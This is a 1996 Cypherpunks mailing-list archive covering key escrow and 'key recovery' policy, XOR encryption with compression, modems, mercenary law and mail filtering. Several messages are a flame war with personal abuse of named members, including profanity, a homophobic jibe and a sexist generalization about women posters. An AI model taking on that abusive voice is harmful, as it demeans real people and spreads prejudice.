From: Declan McCullagh <declan@eff.org>
Date: Thu, 19 Sep 1996 00:44:50 +0800
To: "Timothy C. May" <tcmay@got.net>
Subject: Re: The GAK Momentum is Building...
In-Reply-To: <ae64afeb0a0210046fbe@[207.167.93.63]>
Message-ID: <Pine.SUN.3.91.960918054753.8327D-100000@eff.org>
MIME-Version: 1.0
Content-Type: text/plain


On Tue, 17 Sep 1996, Timothy C. May wrote:
> 
> (BTW, I predict that the tainted term "key escrow" is now gone from the
> official lexicon. I haven't seen the Clipper IV proposal, but I surmise
> that the baggage the term "key escrow" carries means that some more
> benign-sounding term will be used in the final proposal. Something like
> "Key Recovery System." You heard it here.)

I agree, of course. But Gore's office has been telling me about the "Key 
Recovery System" for months. It's nothing new in the DC cryptolexicon.

-Declan


// declan@eff.org // I do not represent the EFF // declan@well.com //






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Declan McCullagh <declan@eff.org>
Date: Thu, 19 Sep 1996 01:27:56 +0800
To: "Vladimir Z. Nuri" <vznuri@netcom.com>
Subject: Re: The GAK Momentum is Building...
In-Reply-To: <199609180338.UAA27100@netcom15.netcom.com>
Message-ID: <Pine.SUN.3.91.960918060003.8327G-100000@eff.org>
MIME-Version: 1.0
Content-Type: text/plain


On Tue, 17 Sep 1996, Vladimir Z. Nuri wrote:

> [business key management plans/infrastructures]
> >However, making the government a _required_ part of such plans implies a
> >motive that is not at all the same as what companies wish (mostly, disaster
> >recovery).
> 
> the distinction lies in the terminology. what does it mean, "required
> part of the plan". if it essentially amounts to nothing more than 
> the government saying, "you must give us keys when we present you
> with a subpoena/warrant", then that's no different than the system
> we have today. again, granted, laws specifically aimed at crypto
> can tend to take up a life off their own. but my main point was
> that the gloom-and-doom peddled by you and lucky green over clipper
> just doesn't mesh with the actual events. the government has 
> visibly had to *backpeddle* *numerous* times in all of its 
> clipper proposals. I see no evidence that the latest proposals
> are going to be any different. what annoys me is people who are
> crying wolf all the time, and even when it seems there are no
> wolves around, or they have temporarily receded,
> they say, "I told you so". "the wolves really are going to
> devour you, just you wait and see"

Perhaps I'm missing something here. If a key recovery infrastructure is 
required, let it develop free of government coercion and intervention. 
Let the free market develop it. If the KRI is indeed free, the Feds won't 
have any problems with us escrowing keys in Switzerland or Belize, will they?

The White House is not backpedaling as much as trying other attacks. 
Like having Clinton call wavering Democratic senators on Senate Commerce 
and reminding them of their political obligations to him in an election year.
And like the government-mandated key recovery infrastructure.

The fight is anything but over.

-Declan


// declan@eff.org // I do not represent the EFF // declan@well.com //





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Troy Varange <varange@crl.com>
Date: Thu, 19 Sep 1996 04:07:37 +0800
To: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Subject: Re: A Bizarre Increase in the Ad Hominems Here
In-Reply-To: <TZ0FuD105w165w@bwalk.dm.com>
Message-ID: <199609181415.AA21481@crl11.crl.com>
MIME-Version: 1.0
Content-Type: text/plain


> tcmay@got.net (Timmy May) (fart) writes:
> > * Detweiler (vznuri@netcom.com) writes:
> 
> Detweiler is much smarter than VZNuri (or Timmy). I don't think Timmy
> believes his own lies.
> 
> > (Sadly, a large fraction of the women who have posted on our list have
> > written in this same kind of incoherent, rambling, makes-no-sense kind of
> > style. I have no idea why the percentage of such events is so high.)
> 
> Is Timmy gay?  Why does he hate women so much?
> 
> > * And of course Vulis has been posting his "farting" messages far and wide.
> 
> Recently, 3 people in the computer security field have independently
> told me that Timmy May approached them "off-list" to complain about
> things I supposedly say on the Internet - most of which I never said.
> When I asked about it on this mailing list, Timmy posted what was shown
> to be a lie (about his complaint to Kelly Goen.) Timmy is known as a
> nutcase and a liar - if he keeps up his "character assassination"
> attacks, the only reputation he hurts is his own.
> 
> Dr.Dimitri Vulis KOTM
Fuckhead.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: roy@sendai.scytale.com (Roy M. Silvernail)
Date: Thu, 19 Sep 1996 00:55:35 +0800
To: cypherpunks@toad.com
Subject: Re: Anthrax on the 'net [Was Re: Fear of Flying -- from HotWired ]
In-Reply-To: <ae649f3407021004825a@[207.167.93.63]>
Message-ID: <960918.071638.9e0.rnr.w165w@sendai.scytale.com>
MIME-Version: 1.0
Content-Type: text


-----BEGIN PGP SIGNED MESSAGE-----

In list.cypherpunks, tcmay@got.net writes:

>
> At 9:14 PM 9/17/96, Mike Fletcher wrote:
>
>>        The Frank Herbert (of _Dune_ fame) book _White Plague_ comes
>>to mind.  Basically a molecluar biologist's wife and kids are killed
>>by an IRA bomb while visiting Dublin.  He snaps and creates a plague
>>which kills women (men are carriers) as revenge.  All without using
>>that nasty Internet (in fact, the book was written back before even
>>ARPAnet).
>
> A _very_ minor correction. My copy of "The White Plague" is not handy, but
> I distinctly recall reading it circa 1980-1, certainly no earlier than
> 1977-8.

Right you are, Tim.  From the Minneapolis Public Library online catalog:

| AUTHOR: Herbert, Frank.
| TITLE: The white plague / Frank Herbert.
| EDITION: 1st ed.
| IMPRINT: New York : Putnam, 1982.
| CALL NO.: SCIENCE FICTION
| PHYSICAL FEATURES: 445 p. ; 24 cm.
| LC CARD NO.: 82-7586
| ISBN/ISSN: 0399127216 :
| OCLC NO.: 08432222



> But of course I agree that "The White Plague" was written long before "The
> Net" became a household name. (Interestingly, Herbert was
> computer-literate, and he even wrote a book about using PCs, circa the late
> 70s....something like "Nailing Jelly to a Tree.")

As long as I'm skulking about the library....

AUTHOR: Herbert, Frank.
TITLE: Without me you're nothing : the essential guide to home computers /
          Frank Herbert, with Max Barnard.
IMPRINT: New York : Simon and Schuster, c1980.
CALL NO.: QA76.5.H46
PHYSICAL FEATURES: 304 p. : ill. ; 25 cm.
OTHER AUTHORS: Barnard, Max,
SUBJECTS: Microcomputers. * Minicomputers.
LC CARD NO.: 80-22315
ISBN/ISSN: 0671412876
OCLC NO.: 06761235
- -- 
           Roy M. Silvernail     [ ]      roy@scytale.com
PGP Public Key fingerprint =  31 86 EC B9 DB 76 A7 54  13 0B 6A 6B CC 09 18 B6
                Key available from pubkey@scytale.com

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMj/pYxvikii9febJAQG4oAP/dJCJ5VO6w3fed5S3XgcyY2phm00G1uFg
PkOdWTMf3Qsom6tciXOrJ9XNv5YStpXq7FFoz0jcHpbicpK6kMvevbrctinLu3GN
M576EomA1iC3RPqn4Pw5D0kuv0JP9sU/egvIw2oOR7auul0Hdl1tZ8qoeejnIdRv
XpfOyrxC6vk=
=OlkL
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: frantz@netcom.com (Bill Frantz)
Date: Thu, 19 Sep 1996 04:20:17 +0800
To: Black Unicorn <unicorn@schloss.li>
Subject: Re: Fear of Flying -- from HotWired
Message-ID: <199609181446.HAA10952@netcom8.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At  1:21 AM 9/18/96 -0400, Black Unicorn wrote:
>> On Thu, 12 Sep 1996 12:03:18 -0700, Bill Frantz wrote:
>> >Gee, biotech has come a long way.  Now I can download the Anthrax DNA
>> >sequence from the net and insert it in some carrier bacteria and start
>> >making Anthrax bacteria.  Neat!
>
>Culturing and growing anthrax is painfully simple.  No DNA required.

Sorry Unicorn, you missed my point.  (1) You need DNA to grow bacteria. 
You can get the DNA two ways.  (A) You get a sample of the beast, or (B)
You get a DNA sequence and then regenerate the DNA.  (I don't think B is
technically feasable yet.)  (2) You can't send samples of the beast thru
the net.


-------------------------------------------------------------------------
Bill Frantz       | "Cave softly, cave safely, | Periwinkle -- Consulting
(408)356-8506     | and cave with duct tape."  | 16345 Englewood Ave.
frantz@netcom.com |           - Marianne Russo | Los Gatos, CA 95032, USA






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Sandy Sandfort <sandfort@crl.com>
Date: Thu, 19 Sep 1996 04:31:10 +0800
To: Anonymous <nobody@replay.com>
Subject: Re: A daily warning regarding Timothy C. May
In-Reply-To: <199609180341.FAA02454@basement.replay.com>
Message-ID: <Pine.SUN.3.91.960918074708.10102B-100000@crl14.crl.com>
MIME-Version: 1.0
Content-Type: text/plain


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
                          SANDY SANDFORT
 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

C'punks,

On Wed, 18 Sep 1996, Anonymous wrote:

> Timothy C. May is a lying sack of shit.

I've never known Tim to lie.  As to the rest, Tim has always 
been above reproach in his personal hygiene.  There is a smell
here, but it comes from anonymous who is obviously a sad,
pathetic loser.  Back under your rock, anonymous.


 S a n d y

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Lucky Green <shamrock@netcom.com>
Date: Thu, 19 Sep 1996 04:28:37 +0800
To: Jim Ray <liberty@gate.net>
Subject: Re: The GAK Momentum is Building...
In-Reply-To: <199609181251.IAA118254@osceola.gate.net>
Message-ID: <Pine.3.89.9609180737.A876-0100000@netcom22>
MIME-Version: 1.0
Content-Type: text/plain





On Wed, 18 Sep 1996, Jim Ray wrote:
> I agree, and hope so. "Key Recovery," while not as Orwellian-sounding as 
> "GAK," is a step on the path to honesty WRT the English language, though 
> it's important to continually point out, as Tim did in his post, that 
> *access* -- rather than just recovery -- is obviously what Mr. Freeh wants.
> 
> I'd count this likely change in terminology as a "cypherpunk victory," 
> albeit a very small and certainly a very hard-fought one.

Nope. It is a Cypherpunk loss. The use of the term "key recovery" for GAK 
now fully obfuscates the distinction between accessing a 
backup copy by the legitimate owner (or his estate, employer, etc.) and 
GAK. Many PKIs will support the former type of key recovery. And for good 
reasons. Thanks to the brainwashers using the same term for GAK, it will 
now become impossible to tell from a basic description of a PKI if it 
supports GAK or not. Furthermore, those who oppose the latter type of key 
recovery (us!), will be pushed further into the fringe by the media 
now being able to mix up our arguments against GAK with arguing against 
true key recovery. [Do you notice the weird constructs I have to use to 
distinguish the two meanings? One of them being new...]

--Lucky




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Sandy Sandfort <sandfort@crl.com>
Date: Thu, 19 Sep 1996 05:02:50 +0800
To: "Dr.Dimitri Vulis KOTM" <dlv@bwalk.dm.com>
Subject: Re: A Bizarre Increase in the Ad Hominems Here
In-Reply-To: <TZ0FuD105w165w@bwalk.dm.com>
Message-ID: <Pine.SUN.3.91.960918075839.10102D-100000@crl14.crl.com>
MIME-Version: 1.0
Content-Type: text/plain


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
                          SANDY SANDFORT
 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

C'punks,

Like Tim, I'm a little surprised at all the stupid name calling
on the list lately.

On Wed, 18 Sep 1996, Dr.Dimitri Vulis KOTM wrote:

> I don't think Timmy believes his own lies.

Again, I don't believe Tim lies, the good doctor's assertions to
the contrary not withstanding.

> Is Timmy gay?  

You should have seen the babe Tim was with at my party.  Where
do folks come up with this nonsense?

> Timmy is known as a nutcase and a liar - if he keeps up his
> "character assassination" attacks, the only reputation he hurts
> is his own.

Yeah, that's the way reputation works, but the gun is definitely
pointed in the other direction.


 S a n d y

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "geeman@best.com" <geeman@best.com>
Date: Thu, 19 Sep 1996 04:53:26 +0800
To: "'paul@fatmans.demon.co.uk>
Subject: RE: Redundancy in XOR encryption
Message-ID: <01BBA53A.2B7FC2A0@geeman.vip.best.com>
MIME-Version: 1.0
Content-Type: text/plain


in any practical or semi-practical application, you'll have to have a way to decompress the 
perfectly compressed data.  A dictionary?  A Huffman-tree-ish sort of thing?  Are you going
to transfer it out-of-band?  **It** becomes the target of interest.


----------
From: 	paul@fatmans.demon.co.uk[SMTP:paul@fatmans.demon.co.uk]
Sent: 	Tuesday, September 17, 1996 12:33 PM
To: 	cypherpunks@toad.com
Subject: 	Re: Redundancy in XOR encryption

> > 
> > Compress P to get perfect compression (ie. 0 redundancy)
> > Encrypt F (the compressed text) using a repeated key XOR
> > 
> > of course this is all rather theoretical as there is no such thing as
> > perfect compression, but I just thought it might be interesting to
> > see if this is indeed strong, superficially it appears so to me...
> > 
> 
> Paul:
>    I think that if the cryptanalyst knows that F has zero redundancy
> that he can run searches from 0 to n bits for the key and have
> the computer flag solutions that have zero redundancy.  

I never though of that.
 
>    I also think that a perfectly compressed file would have a relative
> entropy value close to one also, hence the computer could flag possibles 
> that have both characteristics.

yeah, these two are reasonably unlikely to occur together (only a 
reasoned guess, anyone got any comments on this?)
so we really have a weakish system.
 
>    Hence, instead of searching for plaintext by counting coincidences,
> we are searching the decrypts for solutions that have zero redundancy
> and a relative entropy value close to one.  How many solutions will
> have both these qualities?  I don't know.  But if the compression method 
> is known, brute force will be tried, and only having to try to 
> decompress (read) data that has the resultant characteristics
> of compressed information will speed things up by quite a bit.

Yeah, this is still a form of brute force but I was thinking of this 
in terms of a smallish (sub 200 bit) key, so brute force against 
solutions with 0 entropy is a realistic possibility.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: DMiskell@envirolink.org (Daniel Christopher Miskell)
Date: Thu, 19 Sep 1996 00:12:15 +0800
To: cypherpunks@toad.com
Subject: Re: A daily warning regarding Timothy C. May
Message-ID: <v01540b00ae65a6cd6c10@[150.160.45.151]>
MIME-Version: 1.0
Content-Type: text/plain


>Timothy C. May is a lying sack of shit.

Right.  And you had to insult him through use of anonymous mail.  Boy, you're
real brave, shedding the light to the rest of the cypherworld in such a manner.

Apologies for the spam, but there was no address, obviously.

--
If in fact we are the only intelligent life on this planet, why the fuck are
we in this goddamn mess?
--
Find my public key on the World Wide Web -- point your browser at:
http://bs.mit.edu:8001/pks-toplev.html






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Thu, 19 Sep 1996 05:06:09 +0800
To: cypherpunks@toad.com
Subject: Re: The GAK Momentum is Building...
Message-ID: <ae6566b70d0210046214@[207.167.93.63]>
MIME-Version: 1.0
Content-Type: text/plain


At 12:49 PM 9/18/96, Declan McCullagh wrote:
>On Tue, 17 Sep 1996, Timothy C. May wrote:
>>
>> (BTW, I predict that the tainted term "key escrow" is now gone from the
>> official lexicon. I haven't seen the Clipper IV proposal, but I surmise
>> that the baggage the term "key escrow" carries means that some more
>> benign-sounding term will be used in the final proposal. Something like
>> "Key Recovery System." You heard it here.)
>
>I agree, of course. But Gore's office has been telling me about the "Key
>Recovery System" for months. It's nothing new in the DC cryptolexicon.

Yeah, I shouldn't have added the "You heard it here" line, implying I had
invented the term. As others have noted, this seems to be the new term for
key escrow. The brainwashing must've taken hold on me, and as a good
citizen-unit I had absorbed the message: "Key Recovery is Security,
Ignorance is Strength."

--Tim May

We got computers, we're tapping phone lines, I know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^1,257,787-1 | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: David Lesher <wb8foz@nrk.com>
Date: Thu, 19 Sep 1996 01:09:21 +0800
To: cypherpunks@toad.com (Cypherpunks)
Subject: Re: PGP in the workplace
In-Reply-To: <ae64d1c30c021004635b@[207.167.93.63]>
Message-ID: <199609181244.IAA26798@nrk.com>
MIME-Version: 1.0
Content-Type: text


> 
At 3:20 AM 9/18/96, Rick Osborne wrote:
> 
 >Upon explaining to them that I was simply trying to make sure of my own
 >security.......

I agree, send this to Scott Adams. 
-- 
A host is a host from coast to coast.................wb8foz@nrk.com
& no one will talk to a host that's close........[v].(301) 56-LINUX
Unless the host (that isn't close).........................pob 1433
is busy, hung or dead....................................20915-1433




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: pjb@ny.ubs.com
Date: Thu, 19 Sep 1996 00:46:25 +0800
To: cypherpunks@toad.com
Subject: Re: 56 kbps modems
Message-ID: <199609181248.IAA06860@sherry.ny.ubs.com>
MIME-Version: 1.0
Content-Type: text/plain


if nothing else, the availability of 56kbps on an analog line might get the
telcos to bring the isdn prices down to some reasonable level, which at the moment,
it is not, at least not in nyc.

	-paul

> From cypherpunks-errors@toad.com Tue Sep 17 18:21:03 1996
> From: Adamsc@io-online.com (Adamsc)
> To: "Bill Stewart" <stewarts@ix.netcom.com>,
>         "cypherpunks@toad.com" <cypherpunks@toad.com>
> Cc: "Asgaard" <asgaard@Cor.sos.sll.se>, "Enzo Michelangeli" <enzo@ima.com>
> Date: Tue, 17 Sep 96 12:22:15 -0800
> Reply-To: "Chris Adams" <adamsc@io-online.com>
> Priority: Normal
> X-Mailer: Chris Adams's Registered PMMail 1.52 For OS/2
> Mime-Version: 1.0
> Content-Type> : > text/plain> ; > charset="us-ascii"> 
> Content-Transfer-Encoding: 7bit
> Subject: Re: 56 kbps modems
> Sender: owner-cypherpunks@toad.com
> Content-Length: 1107
> 
> On Sun, 15 Sep 1996 01:31:19 -0700, Bill Stewart wrote:
> 
> >and still get the original 56kbps back out.  But if they can, well,
> >yee-hah, ISDN is nearly dead :-)  (Not totally dead; the signalling is
> >still useful for some applications, the convenience of two channels on
> >one wire pair is nice, and the fact that people can get 56kbps without
> Also, can't you add ISDN b-channels ? (I.e. get another 64kps channel)
> >the phone company's help will pressure them into offering ISDN for
> >a lower price in areas where the Phone Company's idea of "all the market 
> >will bear" is substantially higher than voice pricing.)
> 
> ISDN is more elegant; this sounds like a 'kludge' of sorts. OTOH, we've all
> seen how well a cheap kludge can do, right?
> 
> # Chris Adams <adamsc@io-online.com> | http://www.io-online.com/adamsc/adamsc.htp
> # cadams@acucobol.com | V.M. (619)515-4894
> "I have never been able to figure out why anyone would want to play games on
> a computer in any case when the whole system is a game.  Word processing,
> spreadsheets, telecoms -- it's all a game.  And they pay you to play it."
> 	-- Duncan Frissell
> 
> 
> 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Ray <liberty@gate.net>
Date: Thu, 19 Sep 1996 00:55:10 +0800
To: cypherpunks@toad.com
Subject: Re: The GAK Momentum is Building...
Message-ID: <199609181251.IAA118254@osceola.gate.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Mime-Version: 1.0
Content-Type: text/plain
Content-Transfer-Encoding: 7bit

To: cypherpunks@toad.com
Date: Wed Sep 18 08:48:43 1996
Tim May wrote:

<...>

> (BTW, I predict that the tainted term "key escrow" is now gone from the
> official lexicon. I haven't seen the Clipper IV proposal, but I surmise
> that the baggage the term "key escrow" carries means that some more
> benign-sounding term will be used in the final proposal. Something like
> "Key Recovery System." You heard it here.)

I agree, and hope so. "Key Recovery," while not as Orwellian-sounding as 
"GAK," is a step on the path to honesty WRT the English language, though 
it's important to continually point out, as Tim did in his post, that 
*access* -- rather than just recovery -- is obviously what Mr. Freeh wants.

I'd count this likely change in terminology as a "cypherpunk victory," 
albeit a very small and certainly a very hard-fought one.
JMR


Regards, Jim Ray -- DNRC Minister of Encryption Advocacy

"As govt.s grow arithmetically, corruption grows exponentially."
 -- Ray's Law of official corruption.

 Defeat the Duopoly!             Stop the Browne out.
 Harry Browne for President. Jo Jorgensen for Vice-president.
 http://www.HarryBrowne96.org/   http://www.twr.com/stbo
___________________________________________________________________
PGP id.E9BD6D35 51 5D A2 C3 92 2C 56 BE  53 2D 9C A1 B3 50 C9 C8
I will generate a new (and bigger) PGP key-pair on election night.
<mailto:liberty@gate.net> http://www.shopmiami.com/prs/jimray
___________________________________________________________________

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMj/vsG1lp8bpvW01AQFkhwP/XEkJkdXwYsdSM8kn+B3bR/bCDXaKgkIE
p63RgjQ5C60byufXqlqitvuJPMuS19MRxlF7UXsXJXKY6Jm92Q45sQtLICsMqXhP
/iJwDVYaEuDj24cFycsZjZMeT+xxnuy+OCuhKIEgKF6gjh2uEZxbCellCqJ86TPF
XfPiQiTPBDo=
=B2hR
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Eric Murray <ericm@lne.com>
Date: Thu, 19 Sep 1996 06:41:34 +0800
To: varange@crl.com (Troy Varange)
Subject: Re: A Bizarre Increase in the Ad Hominems Here
In-Reply-To: <199609181415.AA21481@crl11.crl.com>
Message-ID: <199609181553.IAA28096@slack.lne.com>
MIME-Version: 1.0
Content-Type: text/plain


Troy Varange writes:
> 
> > tcmay@got.net (Timmy May) (fart) writes:
> > > * Detweiler (vznuri@netcom.com) writes:

[spew from "Dr.Dimitri Vulis" deleted]


> Fuckhead.

If you think someone's a fuckhead, please just put them in your
KILL file and get on with your life.  You don't need to announce
your discovery to the rest of the group- we either agree with
you (and have killifiled the fuckhead) or we don't agree that
he's a fuckhead.  Your announcement will sway no one's opinion.
All it does is add to the noise.

Thanks.

-- 
Eric Murray  ericm@lne.com  ericm@motorcycle.com  http://www.lne.com/ericm
PGP keyid:E03F65E5 fingerprint:50 B0 A2 4C 7D 86 FC 03  92 E8 AC E6 7E 27 29 AF




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Thu, 19 Sep 1996 08:05:25 +0800
To: cypherpunks@toad.com
Subject: Mercenaries
Message-ID: <ae65693e0e021004fa1e@[207.167.93.63]>
MIME-Version: 1.0
Content-Type: text/plain


At 9:40 PM 9/17/96, William Knowles wrote:
>On Tue, 17 Sep 1996, Michelle Thompson wrote:
>
>> Interesting information from a friend of mine-
>>
>> >An american can not serve for pay for a position in another military
>> >that could be filled by local populace.  I may have my jurisdiction
>> >wrong tho, this could be an international law not a US law.
>> >Basically, you can't go be a grunt or an assasin in another country,
>> >because they can find their own,

As to Michelle's point that Americans cannot serve for pay in other
militaries, there are all sorts of waivers and "look the other way"s
involved. For example, the retired American officer who became the top
military man in Estonia (or one of the Baltic States)--while still
retaining his U.S. citizenship.

>What about the French Foreign Legion? or the Volunteers for Israel,
>which isn't really a fighting force, but Americans can help keep
>the Israeli army at a ready state.

Israel is one of several states which the U.S. allows dual citizenship
with. For political reasons, because of America's extermination of the Jews
in WW II (Whoops, we were on the other side...so why do we have such a cozy
deal with Israel, but not with, say, France? Beats me. Politics.)

Brian Davis, our former Prosecutor, can tell us how likely it is that any
person would be charged and brought to trial for being a paid mercenary for
some small country in the Third World. The CIA is often behind such
mercenaries, so national security issues could make the issue murky.

But the real reason such prosecutions are rare is that the government
realizes how Orwellian it sounds to say:

"You are being prosecuted because you were a mercenary for Oceania in its
war with Eastasia. While Oceania was once our ally in our battle with
Eastasia, and we endorsed and financed your role as a mercenary, we became
allies with our great friend Eastasia and are now in a state of war with
the tyrants of Oceania."


>Explicit isn't a dirty word, Or is it?

AOL has declared "explicit" to be a Banned Word, along with "pissant,"
"craps," and "cock," and numerous other such ordinary words. (So much for
mentioning their pissant policies, a game of craps in Las Vegas, or a male
chicken.)

--Tim May

We got computers, we're tapping phone lines, I know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^1,257,787-1 | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Eric Murray <ericm@lne.com>
Date: Thu, 19 Sep 1996 08:47:46 +0800
To: cmefford@avwashington.com (Chip Mefford)
Subject: Re: cypherpunk listserve usefulness
In-Reply-To: <v03007801ae65b79e711a@[207.79.65.35]>
Message-ID: <199609181601.JAA28161@slack.lne.com>
MIME-Version: 1.0
Content-Type: text/plain


Chip Mefford writes:
> 
> 
> As much as it shames me, I have recently discovered that by filtering
> messages from only 2 participants and setting body filters on 3 keywords
> have remarkably improved the usefulness of this listserve.

Out of curiosity, what are those keywords?
 
> As much as I do enjoy some of the filtered subject matter, I really feel it
> is very off subject and makes this listserver useless for the intended task.
> 
> I guess that makes me a censor and it has me reexamining some things.

No, filtering your mail does NOT make you a censor, unless you're
filtering the mail before it is gatewayed to a list or newsgroup
where other people read it.  And they didn't ask you to do the filtering.

Filtering your own mail is akin to choosing which articles
in a magazine to read.  It's not censorship if you don't
read an article; it's the article's author's fault that
he didn't make the article interesting enough for you to read.


I think that anyone who has to work for a living must filter
the cypherpunks list in order to cut out some of the crap.
Most people just don't have the time to wade through everything, and
filtering some of it out is a good start on upping the S/N ratio.
What you consider Signal and Noise however is entirely up to you.

-- 
Eric Murray  ericm@lne.com  ericm@motorcycle.com  http://www.lne.com/ericm
PGP keyid:E03F65E5 fingerprint:50 B0 A2 4C 7D 86 FC 03  92 E8 AC E6 7E 27 29 AF




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Thu, 19 Sep 1996 09:03:17 +0800
To: cypherpunks@toad.com
Subject: Re: cypherpunk listserve usefulness
Message-ID: <ae656d5f0f021004f264@[207.167.93.63]>
MIME-Version: 1.0
Content-Type: text/plain


At 2:33 PM 9/18/96, Chip Mefford wrote:
>As much as it shames me, I have recently discovered that by filtering
>messages from only 2 participants and setting body filters on 3 keywords
>have remarkably improved the usefulness of this listserve.
>
>As much as I do enjoy some of the filtered subject matter, I really feel it
>is very off subject and makes this listserver useless for the intended task.
>
>I guess that makes me a censor and it has me reexamining some things.

No, it certainly does not make you a "censor." It makes you more
_discriminating_, but this is often a good thing.

A _censor_, by all standard definitions one can find, is one who restricts
what _others_ may read. The form that concerns many of us the most is when
a government uses its monopoly on force to censor. (But the term can also
apply to when churches or corporations act as censors of what
worshipper-units or employee-units may read or view.)

I hope by "has me reexamining things" you do not mean that your experience
with filters means support for government telling us all which filters we
must use.

Certainly the CP list is undergoing one of its periodic "sunspot cycles,"
where spambots and loonies are attempting to trash it, and where the
discussions of meaty issues are being affected. We've survived half a dozen
or so such periods, and will survive this. The best way to increase the S/N
ratio is to post more signal.

--Tim May


We got computers, we're tapping phone lines, I know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^1,257,787-1 | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jbugden@smtplink.alis.ca
Date: Thu, 19 Sep 1996 02:12:48 +0800
To: Black Unicorn <unicorn@schloss.li>
Subject: Cognitive Bias and Software Development
Message-ID: <9608188430.AA843065026@smtplink.alis.ca>
MIME-Version: 1.0
Content-Type: text/plain


This reference was chopped from the bottom of a previous message.
 
Communications of the ACM issue on Cognition and Software Development
 
"Developers' thought processes are a fundamental area of concern. Cognitive
scientists have discovered that people's intuitive inferences and probability
judgments do not strictly conform to the laws of logic or mathematics, and that
people are willing to provide plausible explanations for random events. This
article examines the role these phenomenon might have in software development,
ultimately concluding that what are cast as one-sided software development
guidelines can be recast beneficially as two-sided trade-offs"
 
Cognitive Bias in Software Engineering
Webb Stacy and Jean MacMillian
Communications of the ACM
June 1995/Vol 38, No. 6
 
The article contains several good example of various classes of bias, including
the representativeness, availability and confirmatory bias. While the article
specifically adresses issues within the context of software development, all of
these biases are general in nature and have correlates in other fields.
 
Ciao,
James
 
Great minds think alike. Fools seldom differ. - Anonymous





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adamsc@io-online.com (Adamsc)
Date: Thu, 19 Sep 1996 06:08:25 +0800
To: "fletch@ain.bls.com>
Subject: Re: Anthrax on the 'net [Was Re: Fear of Flying -- from HotWired ]
Message-ID: <19960918180841187.AAA221@IO-ONLINE.COM>
MIME-Version: 1.0
Content-Type: text/plain


On Tue, 17 Sep 1996 17:14:53 -0400, Mike Fletcher wrote:

>>>Gee, biotech has come a long way.  Now I can download the Anthrax DNA
>>>sequence from the net and insert it in some carrier bacteria and start
>>>making Anthrax bacteria.  Neat!
>> Now the bad news:  the DNA replicator only works under Windows 95 and comes
>> with buggy drivers!

>	Buggy drivers?  But isn't that the point in this case? :)

True, true... <g>   And you *really* don't want to see what happens when it
crashes!

>> Unfortunately, it can be very deadly.  The idea here is that it rarely infect
>s
>> humans - in the normal course of events.  If a determined biowarrior is tryin
>g
>> to infect people, all bets are off.
>
>	The Frank Herbert (of _Dune_ fame) book _White Plague_ comes
>to mind.  Basically a molecluar biologist's wife and kids are killed
>by an IRA bomb while visiting Dublin.  He snaps and creates a plague
>which kills women (men are carriers) as revenge.  All without using
>that nasty Internet (in fact, the book was written back before even
>ARPAnet).

I remember reading this one.  Very applicable!

# Chris Adams <adamsc@io-online.com> | http://www.io-online.com/adamsc/adamsc.htp
# cadams@acucobol.com | V.M. (619)515-4894
"I have never been able to figure out why anyone would want to play games on
a computer in any case when the whole system is a game.  Word processing,
spreadsheets, telecoms -- it's all a game.  And they pay you to play it."
	-- Duncan Frissell






